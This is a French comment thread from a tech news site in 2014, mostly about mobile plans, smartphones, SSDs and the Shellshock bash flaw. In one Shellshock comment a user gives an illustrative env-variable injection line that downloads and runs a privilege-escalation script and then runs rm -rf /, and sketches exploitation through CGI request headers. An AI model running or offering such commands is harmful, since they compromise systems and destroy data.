Le 09/10/2014 à 12h 07

Putain le sous-titre mérite la SWORD !!

Le 01/10/2014 à 17h 06

Perso, ma 3G Free me va bien, je consomme autour de 3 Go par mois, donc pour 16 euros et appels illimités, c’est bon. " />



Après clairement, entre Lyon et Sainté le réseau est pas mal, donc je suis peut être une exception. Mais jamais eu de soucis à Paris (je suis client chez eux depuis 6 mois). " />



La grosse surprise cela a été au milieu du Pilat (vers Marlhes-Saint Genest Malifaux pour ceux qui connaissent), j’ai de la 3G alors que Orange ne passe même pas !!

" />

Le 30/09/2014 à 09h 24

cendrev3 a écrit :



c’est une coincidence le fait que ca soit maintenant, c’est a cause d’une faille xen et pas bash.





Oups, effectivement, on m’avait menti à l’insu de mon plein gré … et j’avais pas bien vérifié …" />

Le 30/09/2014 à 08h 29

Cette faille met une sacré pagaille quand même.



Le pire c’est chez Amazon qui est obligé de rebooter EC2.

Le 29/09/2014 à 10h 48

cendrev3 a écrit :



Et les cgis qui passent les variables via bash aussi donc une bonne partie des cgis (ca concerne au moins 1 serveur sur 10 qui est exploitable avec ca a la louche je dirais).





Totalement d’accord, c’est loin d’être de la pisse d’âne.



Cela peut vraiment toucher BEAUCOUP de monde.

Le 29/09/2014 à 07h 49

Niktareum a écrit :



Familier !!

Plein de termes familier ne sont pas foncierement francais, mais reconnu comme tant utilisés en francais.





Sinon, c’est cool, un virus linux, ptete qu’ils se calmeront un peu les linuxiens a troller sur chaque news des patchs tuesday et autres joyeusetés du monde dominant (mais loin d’etre parfait, comme les autres) qu’est celui de windows.





Ah le bon windowsien qui fait pas la différence entre une faille et un virus …



" />







Darnel a écrit :



Pour une fois Windows n’est pas concerné " />





Sauf si tu as installé Cygwin …

Le 29/09/2014 à 07h 22

Crysalide a écrit :



Dash ?

https://developer.mozilla.org/fr/docs/Web/HTML/DASH_Adaptive_Streaming_for_HTML_…





Dash

Après je ne sais pas si c’est impacté.

Le 26/09/2014 à 12h 32

GvLustig a écrit :



Question d’un mec qui a plus touché à Linux depuis le passage d’ubuntu sous unity : gnome est sympa et agréable pour des utilisateurs novices? (mes parents)





Mes parents, les grands-parents de ma femme (qui ont découvert l’ordinateur avec) et ma nounou se sont habitués très rapidement." />



Bon c’est moi qui leur ai mis les applications à utiliser mais après tu utilises ton PC, point barre.



" />

Le 25/09/2014 à 15h 04

zempa a écrit :



LibreOffice ???

Quel rapport ???





YouTube

Le 25/09/2014 à 14h 27

zempa a écrit :



Je le fait directement sur la racine, c’est plus simple.

Pourquoi ?





De toute façon, tu as installé libreoffice sur ton serveur, non ?

Donc c’est bon tu es protégé …

" />

Le 25/09/2014 à 14h 01

Citan666 a écrit :



Ouais mais j’veux paaaaas mettre à jour…" /> Trop de changements imposés que j’aime pas dans la dernière version de KDE (j’attends la prochaine tant qu’à faire) et cet enfoiré d’Ubuntu ne veut rien entendre, il met systématiquement l’intégralité des paquets en “dépendance” à MAJ même quand je sélectionne juste un truc non critique (genre éditeur de texte).

Et je déteste qu’on me force la main sans raison.." />





http://www.debianadmin.com/how-to-prevent-a-package-from-being-updated-in-debian…







Citan666 a écrit :



Et du coup, avec un Drupal, comment tu fais par exemple ? " /> (ça fait partie des trucs qui sont probablement triviaux mais avec lesquels je galère toujours)

Je pensais qu’il suffisait de mettre une directive dans le VirtualHost mais il y a certainement des trucs que je pige pas. Au final, le répertoire où sont stockés les fichiers “de contenu” je dois toujours l’ouvrir à tout vent.





Un peu de recherche sur Google ?

https://www.drupal.org/node/244924



Edit : pardon, oui pour ta question, le files doit appartenir au serveur web.







Citan666 a écrit :



Le CHROOT ça avait l’air puissant comme solution, mais je comprends pas tout. Aurais-tu par hasard un tuto/doc compréhensible par un Mickey (apprenti sorcier) admin sys ? " />

Le 25/09/2014 à 13h 56

pentest a écrit :



C’est pas la faille bash qui m’intéresse dans ma démonstration. C’est la méthode employée pour rechercher une faille dans le système, au lieu de copier/coller et executer aveuglement une ligne de code.



Freebsd " />





Sauf que cela implique que la vulnérabilité ait été déclaré dans le xml que tu récupères.

http://vuxml.freebsd.org/freebsd/index-date.html

Bon après, c’est sûr que c’est classe. " />







CaptainDangeax a écrit :



Donc, pour résumer la niouze et tous les posts, cette faille a une portée limitée à un certain nombre de serveurs qui déjà ne sont pas maintenus à jour et qui exploitent un ensemble bien particulier de services, de plus mal configurés d’un point de vue sécurité, la faille elle-même n’étant pas suffisante à elle seule pour permettre de compromettre une machine. Donc pas de quoi s’inquiéter pour Mme Michu qui fait un peu de firefox / thunderbird / chrome / gimp / clementine avec son Linuxmint…





Euh, je tempèrerai ton optimisme en disant qu’il y a probablement plus de serveur web Linux avec apache + mod_cgi que de Mme Michu. " />

Le 25/09/2014 à 13h 41

pentest a écrit :



@srv:~ # pkg audit -F

Fetching vuln.xml.bz2: 100%

0 problem(s) in the installed packages found.



" />





Bah en meme temps bash est pas installé par défaut sur FreeBSD. Donc bon il est plutôt “normal” que ton système soit pas touché.



" />



Edit :

et cela a été corrigé il y a 20h

https://svnweb.freebsd.org/ports/head/shells/bash/

Le 25/09/2014 à 12h 58

Vincent_H a écrit :



Ouaip, c’est une excellente machine " />





Et pas cher en plus. Ceci n’est pas un troll, sauf si quelqu’un me trouve une machine équivalente au même prix.







canti a écrit :



si il administre un serveur de production dans une société, mettre à jour tout les paquets du serveur, c’est s’assurer qu’un paquet à la con va entrainer une régression, et tout casser



c’est pour ça qu’il recommande de ne mettre à jour que le nécessaire





OK. +1, alors " />

Le 25/09/2014 à 12h 36

CaptainDangeax a écrit :



Et dire que la semaine prochaine, je balancerai un serveur Xeon E5520 à la jaille.





Euh si tu sais pas quoi en faire …. " />







coolraoul a écrit :



Waouhh, c’est vraiment le néant cette news pour le coup …



On finit de lire l’article, on en apprend pas plus qu’en ayant lu le titre…



Enfin je parle concrètement sur la faille elle même.





Bah il y a pas grand chose à comprendre. La faille c’est : je peux utiliser une définition de fonction malicieuse dans ma variable d’ENV.

" />



C’est juste un énorme trou de sécu de bash depuis 20 ans



" />

Le 25/09/2014 à 12h 33

typhoon006 a écrit :



sur de la prod mieux vaut màj que le package " />





Lapin compris ?" />

Le 25/09/2014 à 12h 24

levhieu a écrit :



Alors certes, je me suis fais induire en erreur par les petites lignes POC.

Je me disais, si on me laisse utiliser /usr/bin/env, on me laisse donc exécuter ce que je veux.



Or donc, on peut passer des variables d’environnement par d’autres moyens, propres à chaque daemon concerné. Mais pour reprendre l’exemple de ssh, quand j’ouvre une session en passant des variables d’environnement, le sshd se contente de les placer dans l’environnement du processus utilisateur créé. Ou alors, c’est sur sshd qu’il faut se pencher (pas forcément inutile d’ailleurs, au vu de ce qu’on a appris depuis le début de l’année).



Et pour les autres serveurs, même chose: s’ils tournent en root, ils ne doivent pas plus accepter d’injecter n’importe quoi dans leur environnement. S’ils ne tournent pas en root, pas vraiment non plus, mais bon… Et au fait, un serveur XXX ne devrait-il pas tourner d’une manière genérale, i.e. dès que c’est possible, sous le compte XXX ?





:%s/serveur/service/g



Oui, tu as raison. En revanche, comme d’habitude c’est la combinaison de plusieurs failles qui peut faire mal.

Le 25/09/2014 à 12h 18

Khalev a écrit :



Ouai enfin la faille a 22 ans (bash 1.14, sorti en 1992) " />





Oui c’est ça le plus fou, c’est que cela n’ai pas été découvert avant.



" />

Le 25/09/2014 à 12h 16

millman42 a écrit :



Saut que le serveur ssh est lancé en root et que la commande est donc lancé par l’utilisateur root.





Je crois que tu n’as pas compris la faille. Le serveur SSH est lancé en root. Quand tu te connectes dessus, tu instancies un process bash avec ton user, tu es pas root.



Un cas d’attaque pour avoir une élévation de privilège est :

• un serveur apache avec mod_cgi
  


• un vieux noyau
  
  J’encapsule dans les headers de ma requetes la définition de fonction malicieuses qui contient la récupération d’un fichier permettant d’avoir une élévation de privilège sur la version du noyau et soin execution.
  
  
  
  Et voilà.
  
  
  
  Mais pas par un serveur SSH.
  
  
  
  Edit: OK vu ton edit :)
  
  Coucou Edith " />
  

Le 25/09/2014 à 12h 07

millman42 a écrit :



Cela permet tout de même à quelqu’un  possédant un compte user d’exécuter une commande root. J’appelle ça une élévation de privilège moi.





Bah non.





Le facteur limitant la dangerosité de la faille est que les commandes effectuées ne peuvent pas avoir plus de privilèges que l’utilisateur actif n’en a lui-même.

Le 25/09/2014 à 11h 59

luxian a écrit :



Bon sur ce et pour voir si je résume bien l’ampleur du dégats : pour Madame Michu qui emploie son Ubuntu pour taper des lettres avec son pare-feu favori, pour lire ses mails et surfer sur interné, voir pour rajouter des grandes dents au grolland avec The Gimp … quand bien même autoriserait-elle un accès SSH 2 à son support, il n’y a pas de quoi la faire entrer en mode stress à cause d’un malheureux Linux Bashing …





Tout à fait.







luxian a écrit :



En gros, seuls certains serveurs sont réelement concernés.





Et là c’est le drame : tout dépend de ce que tu appelles certains, mais cela peut fait un bon paquet de dégat car certains doit se chiffrer en milliers.

Le 25/09/2014 à 11h 56

millman42 a écrit :



Pas d’élévation de privilège je ne suis pas d’accord si on l’utilise sur un serveur ssh on peut exécuter des commande en root, de même que lorsqu’on l’utilise avec dhcpclient (car ces deamon sont exécuter en root). Et pour exécuter la commande dangereuse il faut juste pouvoir exporter une variable d’environnement. Ce que fais apache avec le mod cgi ou dhcpclient …





Encore faudrait-il avoir le mot de passe ou la clé pour se connecter en SSH.

Le 25/09/2014 à 11h 54

CaptainDangeax a écrit :



C’est toujours la même chose. Le programmeur qui passe en paramètre n’importe quelle chaîne sans en vérifier la syntaxe ne mérite que le fouet. EXEMPLE.

Il y avait l’injection SQL, il y a l’injection bash, les dégas sont fonction des droits du programme appelant.





Rien à voir, car là c’est à la création de l’instance de Bash par cgi que cela va être executé, en utilisant par exemple des entêtes pourris.

Le 25/09/2014 à 11h 50

CaptainDangeax a écrit :



D’après ce que je comprends de la “faille”, notez les guillemets, elle permet à un utilisateur déjà identifié et disposant d’un certain nombre de droits sur la machine cible d’exécuter des commandes avec le même niveau de droit, dans un shell conçu spécialement pour lancer des commandes, justement. Pourquoi je trouve que ça pue le FUD à plein nez ?





Oui et non.



Globalement, sur ton PC qui n’a pas de serveur web (typiquement) tu crains rien. Bon sauf si tu tapes ta commande.



Ensuite, sur un serveur, bah effacer tout le disque dur tu ne peux pas car il faudrait en plus passer par un script qui utilise une faille dans le noyau linux pour avoir une élévation de privilège.



Du genre :



env X=“() { :;} ; wgethttp://mon_script_qui_me_permet_de_passer_root; ./mon_script_qui_permet_de_passer_root; rm -rf /” which bash -c “whoami”





En fait, sur pas mal de serveur Web anciens, genre noyau avec faille présente, bash non patché, tu peux faire très très mal.







127.0.0.1 a écrit :



La faille permet d’executer automatiquement une ligne de commande arbitraire au prochain lancement de “bash”.



Pour cela, il faut créer une variable d’environnement spécialement conçue sur le serveur.



Exemple: un compte “invité” qui a accès au serveur crée une variable d’environnement qui va executer un gros “rm ”. Plus tard, l’administrateur se loggue et ouvre un terminal… et paf ! Bash se lance et execute le “rm ” avec les droits admin.





Euh ta variable d’env elle est pas pour tout le monde mais juste pour l’instance de bash qui est executée ensuite.

Le 25/09/2014 à 08h 09

picatrix a écrit :



le 8 semble être un chiffre maudit parmi les systèmes d’exploitation " />



… window\( 8, io\) 8 etc …



à l’heure de la V6 on peut donc s’attendre à ce que la future V8 de Nxi ne soit pas une réussite " />





Argh je tremble vu que la prochaine Debian sera Debian 8 " />

Le 25/09/2014 à 08h 07

Xhell a écrit :



A chaque version majeure d’OS il y a des problème qui mettent un ou deux patch a être fixé. Les gens n’ont pas encore compris?





" /> sauf pour Debian :) " />







Xhell a écrit :



Bon en même temps on parle de gens capable de croire leur téléphone devenu étanche ou rechargeable au micro-onde grace à une mise à jour logicielle.







La recharge au micro-onde est un fake, créé par les mecs qui ont publié la blague pour faire le ramdam.



" />

Le 24/09/2014 à 15h 05

Lafisk a écrit :



En meme temps, faut etre un peu con pour s’asseoir sur son tel, mais bon, je dis ca, je dis rien …





Euh c’est dans la poche avant donc pas SUR le téléphone. Sinon oui ce serait très bête.



J’ai mon moto E dans la poche AVANT tous les jours. Bon après c’est un téléphone très moyen mais à 110 euros faut pas demander la lune.

Le 24/09/2014 à 12h 49

lanoux a écrit :



vivement la fin de silverlight



canal+ l’utilise et je dois impérativement booter sur windows pour regarder la tv sur l’ordi, car grosse erreur sous linux. Leur site est codé avec les pieds, ça a marché 15jours en juin et pfffff, plus rien





+1, du coup quand il m’ont appelé pour me refiler Canal Play + BeInSport je leur ai dit d’utiliser des systèmes “standards et interopérables”, sinon ce sera NetFlix + BeInSport :)

Le 22/09/2014 à 22h 19

Eh les enfants, du calme, allez jouer sur Clubic " />

Le 22/09/2014 à 21h 33

Impressionnant tout de même un tel chiffre sans la Chine.

" />



Pourtant, je comprend toujours pas pourquoi Apple a pas gardé un modèle 4.5pouces pour le 6 et grand pour le 6 plus, car je connais pas mal de possesseur d’Iphone qui ne veulent pas de téléphone aussi grand.



" />



Quelqu’un connait un phone 4G avec 8Go + Slot SD et surtout un bon appareil photo ?

" />





Pour ceux qui invoquent la crise, je vous rassure c’est pas la crise pour tout le monde :

http://www.bilan.ch/argent-finances/nombre-de-milliardaires-atteint-un-niveau-record-2014

Le 22/09/2014 à 13h 33

vampire7 a écrit :



C’est tellement des “stars” que je connais aucun de ces noms-là. " />





Pareil sauf pour Kaley Cuoco grâce à Big Bang Theory " />

Le 18/09/2014 à 10h 29

Orphis a écrit :



Le NAT va empêcher les autres clients de se connecter à ton mobile pour télécharger. 99.9% des appareils en wifi ne sont pas accessibles.





Tu es en train de dire que 99% des gens qui font du torrent ne partagent rien ? " />

Il y a un plein de méthode pour qu’un appareil derrière un NAT soit accessible.







Orphis a écrit :



Les lignes sont asymétriques. Tu vas télécharger en 5 minutes et donc uploader pendant 5 minutes aussi. Tu vas donc envoyer très peu de données au final, beaucoup de complications pour pas grand chose.





Vrai en France car on a majoritairement de l’ADSL, pas du tout vrai pour le reste du monde.





Orphis a écrit :



Vu la taille des fichiers, c’est très facile de mettre ça sur des CDN qui peuvent absorber la charge s’ils voulaient.





Le fait est que cela doit couter trop cher vu qu’il le font pas. En plus de charger les réseaux en transférant n fois la même chose sur une longue distance.







Orphis a écrit :



Pas vraiment non. Si tout le monde a la notification de mise à jour en même temps, télécharge dans un intervalle très court, tout le monde sera bloqué en même temps. C’est un principe de release très important pour ce genre de mise à jour.





Oui mais qui n’a rien à voir avec le P2P.

Le 18/09/2014 à 09h 36

Orphis a écrit :



Tu as vu à quelle vitesse la batterie descend quand tu es connecté à un wifi ?

Tu as vu à quelle vitesse la batterie descend quand tu es connecté à un wifi ET transfère des données ?

Tu as vu à quelle vitesse la batterie descend quand tu es connecté à un wifi ET transfère des données ET n’est pas branché sur un port USB à fort ampérage ?

Tu as vu à quelle vitesse tu transfères des données quand tu es connecté en wifi, donc derrière du NAT ?





Différence de consommation entre wifi allumé qui fait du downalod et wifi allumé qui fait du DL et de l’upload. Ensuite l’argument du NAT ?? La limitation en upload est liée à l’uplink de ta ligne ADSL, rien à voir avec le NAT.





Orphis a écrit :



Tu as vu combien de personnes disaient avoir assez de place pour installer la mise à jour sans problème dans le thread et qui pourraient se permettre de garder le fichier d’installation sur leur appareil ?





Qui a dit que tu devais garder le fichier APRÈS la mise à jour. L’idée est de seeder en même temps que tu DL le fichier et une fois terminé tu upload plus.





Orphis a écrit :



Tu as déjà vu une mise à jour majeure du firmware distribuée super rapidement sur tous les appareils ? Imagine si tout le monde rencontrait un bug majeur en même temps, ils n’auraient pas forcément le temps de sortir un correctif avant que tout le monde n’ait mis à jour.





Euh Apple ayant la capacité de faire ce que tu veux de ton tel, il peuvent très bien interrompre le problème de mise à jour.







Orphis a écrit :



Il y a pleins de raisons de ne pas faire de P2P. Et il y a encore plein d’autres raisons de ne pas nécessairement chercher à faire la mise à jour super rapidement.





Bah non pour le P2P. Par contre +1 pour ne pas se jeter sur les mises à jour.

Le 17/09/2014 à 17h 24

Je comprends pas pourquoi les distributeurs d’os utilise pas des systèmes pair à pair pour distribuer leur mises à jour.



C’est quand même stupide de devoir dimensionner des serveurs, fussent-ils virtualisés, pour réponde à une charge exceptionnelle qui serait redistribué par mes clients.



Un genre de apt-torrent mais qui marche …

Le 16/09/2014 à 10h 03

bug

Le 16/09/2014 à 10h 02

aurel_gogo a écrit :



J’ai vu " /> et je me tate à faire peter la CB !!!!!









loloemr a écrit :



Honnêtement, le SSD cela redonne vie à un PC.

Mon fixe perso avec un pauvre Core 2 Duo [email protected] a vraiment apprécié le petit Samsun 840 256 Go que je lui ai rajouté.



Temps de boot, chargement des jeux (ex Civ 5), exploration des fichiers, tout est VRAIMENT plus rapide.

Le 16/09/2014 à 09h 45

aurel_gogo a écrit :



J’y songe sérieusement depuis un moment mais il m’en faut 2 : un pour mon PC et un pour mon mac





Oh que vois-je dans les bons plans Nextinpact sur la droite ?



" />

Le 16/09/2014 à 09h 21

Naneday a écrit :



Il est temp d’investir dans un SSD, ca vaut le coup fonce !





Non, il est temps de tout racheter pour profiter des nouvelles révolutions.



Blague à part, +1 pour le SSD …

Le 11/09/2014 à 11h 32

grayswandin a écrit :



Je comprends pas cette fragmentation, c’est énorme…





Qu’est ce que tu comprends pas ? Qu’il y a 20 (?) constructeurs différents qui proposent 3000 modèles différents et qui ne supportent pas le vieux matos (ce qui leur coute) pour inciter les gens à renouveler leur phone (ce qui leur rapport de l’argent) ?



" />

Le 11/09/2014 à 11h 23

newsdunet a écrit :



Je ne suis pas certain qu’une news par mois soit vraiment nécessaire.

Next INpact

Next INpact

Next INpact

Next INpact

Next INpact





Bienvenue sur BFM TV, les gros titres du jour : “il neige et c’est le bazar”, tu y as droit tous les ans" />

Le 11/09/2014 à 11h 29

Gilbert_Gosseyn a écrit :



Matrox Millenium 2 Mo par ici :p.





Copaing :)

Le 11/09/2014 à 11h 28

juntawflo a écrit :



il y a des gens qui utilisent vraiment hangouts ?





Très régulièrement pour faire faire des vidéos confs enfants-grand parents loin.

Et souvent au taf aussi pour les collègues distant.





" />

Le 10/09/2014 à 11h 35

misterB a écrit :



je vais me prendre le iphone 6 mais le Z3 me fait aussi de l’oeil " />





Hérétique !!!!!

Tu ira relire trois fois la bibliographie de Steve Jobs et tu recopieras 200 fois :

“I’m going to destroy Android, because it’s a stolen product. I’m willing to go thermonuclear war on this.”

" />





misterB a écrit :



Seul problème Andro j’ai du mal " />





Perso de plus en plus aussi, l’environnement me rappelle la belle époque des shareware moisis sous Windows 9X.



" />

Le 09/09/2014 à 17h 35

John Shaft a écrit :



Maintenant le trader qui saute par la fenêtre 1929 style pourra surveiller sa chute " />





L’important c’est pas la chute …" />







Fueg a écrit :



" /> je l’ai sur mon note 3 , je sais pas quoi faire avec ça

des fois je tiens le téléphone au raz du sol, et ensuite le lève le bras, putain j’ai bien 2m de plus niveau altitude.

c’est vraiment super quoi " />







Randonnée en montagne et sortie vélo :)

Le 09/09/2014 à 17h 31

Par contre l’altimètre-baromètre c’est cool " />

Le 09/09/2014 à 17h 24

Espérons pour Apple que Jobs se soit trompé …



http://www.engadget.com/2010/07/16/jobs-no-ones-going-to-buy-a-big-phone/



" />" />

Le 03/09/2014 à 10h 31

Compatible Linux ! " /> " />



Pour 22€, je vais peut être me laisser tenter :)

Le 29/08/2014 à 18h 16

En esperznt que cela faqse baisser un peu le 4970 histoire que ke puisse changer mon e6600 qui a fait son temps " />

Le 28/08/2014 à 12h 36

Glisser pour déverrouiller, les liens rapides et l’autocorrection



Sérieusement " />

Le 27/08/2014 à 08h 44

digital-jedi a écrit :



Quels sont tes arguments contre le Moto G 4G à 179€ ? Je suis d’accord que le Moto E a des spécs pourries.





C’est celui qui me paraissait le mieux mais la qualité photo a pas l’air géniale.



http://www.frandroid.com/marques/motorola/228059_test-du-moto-g-4g-entree-gamme-toujours-dactualite

J’ai une nexus 7 + un abo Free Mobile donc je cherche un téléphone pas trop grand (<4.5’) mais avec un bon appareil.



Le moto E est pas mal pour le prix (autonomie correcte, à peu près fluide tout le temps, un slot microSD) mais les photos sont vraiment à chier. Et a priori c’est la même pour le Moto G.